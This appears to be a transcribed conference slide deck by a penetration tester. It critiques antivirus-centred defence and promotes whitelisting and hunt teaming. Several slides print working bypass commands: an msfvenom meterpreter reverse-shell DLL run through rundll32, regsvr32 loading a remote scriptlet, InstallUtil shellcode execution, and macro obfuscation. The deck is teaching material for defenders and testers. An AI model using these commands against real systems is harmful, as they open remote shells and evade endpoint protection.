Users They Click things

Transcription

1 If I wake evil

2 Users They Click things

3 I like shiny things Do you find a need to have multiple twitter followers? Do you desire clicks on Facebook? Do you snort LinkedIn requests like a bad 80 s bender? Then Do I have a link for you!!! Truth!

4 How do bad things happen? We seem to be in a loop A very bad loop Getting angry at questions Best AV? Best DLP? Best Threat Intel Feed? Best Firewall? Patterns and Chiasms This.. Without the learn.

5 Password example Most password complexity requirements are: >8 Characters Upper/Lower/Alpha/Num No Dictionary words Full of fail We cannot fix this because of compliance! Truth!

6 NIST Greenbook

7 The Need for a Good Password Set

8 YESSS!!!

9 OWA 2FA bypass - Beau

10 OWA/Office365 2FA bypass - Beau Today

11 Cash Cow Tipping. Bypass everything.. AV, DLP, Firewalls, etc. Trivial to do.. More smoke and mirrors Get previous sessions here: Tinyurl.com/504extra2

12 It Wont Get Better Mail Providers Blocking Powershell Macros

13 Obfuscate Empire Macro Appear to just look for powershell in macro Well just break up the string

14 Do you run any of these?

15 (Casey Smith) is awesome Please, take a moment and follow By pulling down InstallUtil-ShellCode.cs and inserting msvenom (-f csharp) into it Compile with the csc.exe tool Awesome! Because it does not need a full Visual Studio Environment Walkthrough here: here:

16 InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

17 Is this some kind of joke?.sct files?/? Huh? No joke.

18 .sct Running it regsvr32 /s /n /u /i: scrobj.dll Yea regsvr32 can take a url It is Proxy aware Uses TLS Is a signed MS binary

19 Advanced Endpoint Security We are seeing Vision (Hi Dave!!), Cylance, Bit9 (to a lesser extent), CrowdStrike, etc. on more tests Most are train wrecks Total train wrecks White listing is a thing Get used to it Smaller organizations doing much better Larger orgs getting it Yea, scary Do not base purchases on a companies marketing budget

20

21 Cyfort bypass - Derek Last week

22 Cylance bypass - Joff Two lines # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=y -f dll -o msf.dll C:\> rundll32.exe msf.dll, Control_RunDLL Yea That s pretty much it What does this mean?

23 Full access to Win

24 Cylance

25 Full Access

26 Web Proxy Whitelisting Bypass Yesterday Brian Big thanks

27 Moving forward AV, DLP, Firewalls, Threat Intelligence Feeds, Cyber Kill-Chain Lets leave those old things behind If we started all over again How would we do it? There is a lot of baggage over the years. Time to let that go too. This is all based on our testing and training Same loops, same patterns

28 Attacking a VPN FatPipe Found by Joff Thyer They have not responded in months Problem with key reuse If the same key is used For all installations I can steal that key And decrypt on the fly Copyright 2014

29 Bruce Cries... Copyright 2014

30 ECM Copyright 2014

31 Quick!! To Python! Copyright 2014

32 Results!! Copyright 2014

33 Lesson Exploits are not always buffer/heap overflows We need to look deeper into the logic of things. Copyright 2014

34 SDR.. Is Awesome! 300/315/390 MHz Copyright 2014

35 But Can Be frustrating.. Copyright 2014

36 Stealing your garage door opener Copyright 2014

37 Binary! Copyright 2014

38 WAV to bin.. Partial Copyright 2014

39 Lesson Security is moving on Not just OS and Web security Copyright 2014

40 Stop me New Fundamentals App Locker and SRP Long Passwords Two Factor Auth Firewall Everything Internet Whitelisting Regularly Test Things Assume you will be compromised.. Plan Accordingly!!!! Copyright 2014

41 Why Current Strategies Are Not Working Offensive: You will need to attack Defensive: Know our limitations Go back 5 or 6 years... What were they saying to defend networks? - Patch - AV - IDS/IPS What are they saying now? - Patch - AV - IDS/IPS Do you see the beginning of a bad pattern? This section is good for defense and for your attacks against the bad guys Copyright 2014

42 THIS!! Hunt Teaming Actively looking for advanced attackers - You probably have been compromised If we can bypass AV/IDS/IPS.. Attackers can too! Intelligent analysis of all data sources at your disposal - Lots of logs and data to analyze - Oh And math, there is lots of math as well Copyright 2014

43 Pictured Not hunting Copyright 2014

44 The RITA Hunt Solution Parse Bro Data Sources Extract Data of Interest around Network / Application Sessions Use Math and Statistical Methods to Find Anomalous Activity Enable Security Analysts to Visualize and Identify potential trouble makers. Copyright 2014

45 What did you think security was going to be? Copyright 2014

46 Lets Practice! Thanks To Mark Baggett!!! Copyright 2014

47 More! More Practice! Copyright 2014

48 Want this? And other things. Copyright 2014

49 A note on architecture Copyright 2014

50 Thanks for attending! John Strand john@bhis.co Puppies Make It All Better Copyright 2014

51 Oh One more thing Webcasts! Free!!! Every month!!! Register here.. Because we trust QR Codes - > Copyright 2014